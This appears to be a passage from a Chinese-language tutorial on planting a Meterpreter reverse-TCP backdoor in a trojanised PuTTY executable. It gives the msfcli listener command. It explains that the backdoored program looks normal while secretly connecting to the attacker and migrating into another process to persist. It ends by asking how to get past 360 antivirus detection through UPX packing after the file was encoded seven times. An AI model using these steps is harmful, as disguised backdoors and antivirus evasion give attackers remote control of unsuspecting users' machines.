三、靶机测试
在靶机上运行我们的恶意后门之前,首先要在攻击机上开启监听程序: msfcli exploit/multi/handler payload=windows/meterpreter/reverse_tcp LHOST=IP LPORT=80 E
然后再靶机上运行putty_backdoor.exe之后,结果会和正常程序一样,唯一不同的是会悄悄连接我们的攻击主机,然后运行migrate命令,将我们的攻击载荷迁移到其他正常进程中,可以避免随着putty的关闭而关闭。如何感染文件,如何确保下次自启动,如何获取文件,则是meterpreter负责的后渗透工作了。
问题:
这里自己做的putty_backdoor.exe尽管经过了7次编码,但是还是被360一下检测出来了,如果想免杀,最简单的方法是加壳;可以使用UPX工具来加壳,可是自己运行upx命令时却无法对putty_backdoor.exe加壳,提示 CantPackException: superfluous data between sections“节之间有数据错误” 但是如果对于是正常的putty.exe则upx可以正常打包,看来是msfencode导致了文件格式的错误,但是却并不妨碍程序运行,但是应当如何修改呢?